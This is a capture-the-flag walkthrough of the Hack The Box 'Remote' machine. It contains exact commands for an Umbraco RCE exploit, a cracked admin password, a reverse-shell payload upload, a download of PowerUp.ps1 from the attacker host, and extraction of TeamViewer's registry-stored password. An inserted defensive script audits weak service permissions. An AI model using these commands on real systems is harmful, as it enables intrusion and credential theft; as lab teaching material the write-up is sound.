Remote - Hack The Box w/o Metasploit.

Remote is an easy Windows machine from Hack The Box.

Let's get started with the results of the nmap scan.

On port 80 there was an HTTP server running.

When I navigated through the pages I found some names that could be potential usernames.

I thought of brute forcing these usernames against the SMB service.

In parallel I also started gobuster and got the output below.

At /umbraco I found a login page.

I tried basic SQL injection, but it was not working.

Here I got introduced to the Umbraco CMS. Straight away I googled for an Umbraco exploit.

But I was not sure about the version running, and the exploit also needed admin credentials.

Later, when I examined the nmap results, I saw port 111 open, so there was a possibility of RPC services like NFS, nlockmgr, etc.

I checked it using the showmount command.

Let's enumerate this backup!!

From this list I decided to investigate web.config for possible passwords.

I was not able to locate any useful password, but I found a file named

Umbraco.sdf

Using the find command I located the file, and using the strings command I was able to find the admin hash.

[email protected]

hash : b8be16afba8c314ad33d812f22a04991b90e2aaa

By using john I was able to crack the hash in no time.

The password is baconandcheese.

I tried to log in to the Umbraco portal with these credentials.

I confirmed the Umbraco version: v7.12.4.

A customised exploit for the CVE was found on GitHub:

https://github.com/noraj/Umbraco-RCE

I was able to get RCE. In the example below I executed the 'systeminfo' command:

python3 exploit.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a '-NoProfile -Command systeminfo'

Using msfvenom I created a payload that connects back to my attacker machine.

I was able to upload it through the CMS dashboard.

I was able to locate the shell I uploaded.

Now it is time to execute it and obtain the shell:

python3 exploit.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a '-NoProfile -Command C:/inetpub/wwwroot/media/1038/ehackify.exe'

Within no time I got the shell.

I downloaded PowerUp.ps1 to the target machine to enumerate privilege escalation paths:

Invoke-WebRequest -Uri http://10.10.14.195/Powerup.ps1 -OutFile p.ps1

It's possible to abuse the UsoSvc service at C:\Windows\system32\svchost.exe.
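As an added example (not from the write-up, and not PowerUp's own code), here is a defender-side check for the weakness PowerUp flagged: a service whose configuration can be rewritten by ordinary users. It assumes it is run in an elevated PowerShell on the host being audited and that sc.exe is on the PATH.

```powershell
# Added example: find services whose DACL lets broad groups change their
# configuration, take ownership or rewrite the DACL (the UsoSvc finding above).
# Assumes: elevated PowerShell on the audited host, sc.exe available.

# Service-specific SDDL right codes that let a caller hijack the service.
$dangerousRights = @{
    'DC' = 'SERVICE_CHANGE_CONFIG'   # rewrite binPath / start account
    'WD' = 'WRITE_DAC'               # grant oneself any right
    'WO' = 'WRITE_OWNER'
    'GA' = 'GENERIC_ALL'
    'GW' = 'GENERIC_WRITE'
}
# Trustee aliases / SIDs that cover every interactive or authenticated user.
$broadTrustees = @('AU', 'BU', 'WD', 'IU', 'S-1-1-0', 'S-1-5-11', 'S-1-5-4', 'S-1-5-32-545')

function Get-WeakServiceAce {
    param([string[]]$Name = (Get-Service | Select-Object -ExpandProperty Name))
    foreach ($svc in $Name) {
        # sc.exe (not the 'sc' alias for Set-Content) prints the service SDDL.
        $sddl = (& sc.exe sdshow $svc 2>$null) -join ''
        if (-not $sddl) { continue }
        # Allow ACEs look like (A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY); audit ACEs (AU;...) are skipped.
        foreach ($m in [regex]::Matches($sddl, '\(A;[^;]*;([^;]*);;;([^)]+)\)')) {
            $rights  = $m.Groups[1].Value
            $trustee = $m.Groups[2].Value
            if ($broadTrustees -notcontains $trustee) { continue }
            # Rights are two-letter codes concatenated; split them so 'SD'+'CC' is not read as 'DC'.
            $codes = for ($i = 0; $i + 1 -lt $rights.Length; $i += 2) { $rights.Substring($i, 2) }
            $hits  = $codes | Where-Object { $dangerousRights.ContainsKey($_) }
            if ($hits) {
                [pscustomobject]@{
                    Service = $svc
                    Trustee = $trustee
                    Rights  = ($hits | ForEach-Object { $dangerousRights[$_] }) -join ','
                    BinPath = (Get-CimInstance Win32_Service -Filter "Name='$svc'").PathName
                }
            }
        }
    }
}

# Check the service named above first, then sweep the whole host.
Get-WeakServiceAce -Name 'UsoSvc'
Get-WeakServiceAce | Format-Table -AutoSize
```

Any row returned is a service that a non-administrator could repoint at a binary of their choosing; the fix is to tighten its DACL (sc.exe sdset) so only SYSTEM and Administrators hold those rights.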

I also ran winPEAS.exe

and found that TeamViewer was running.

I decided to proceed without Metasploit.

https://docs.microsoft.com/en-us/powershell/scripting/samples/working-with-registry-entries?view=powershell-7

I navigated to the TeamViewer registry location and executed the commands below to extract the password:

Get-ItemProperty -Path HKLM:SOFTWARE\WOW6432Node\TeamViewer\Version7

I was able to read SecurityPasswordAES with the command below:

(New-Object -ComObject WScript.Shell).RegRead("HKLM\SOFTWARE\WOW6432Node\TeamViewer\Version7\SecurityPasswordAES")

These numbers are base-10 integers, and we have to convert them to base 16 (hex).

From GitHub I was able to find a script to decrypt this, and I got the password as

!R3m0te!

Next is to login as administrator with this password.

I used evil-winrm to log in.

System Compromised!

If you found this write-up useful, you can give me respect on Hack The Box:

https://www.hackthebox.eu/home/users/profile/240146

You can connect with me on

LinkedIn: Derick N

Twitter: Derick N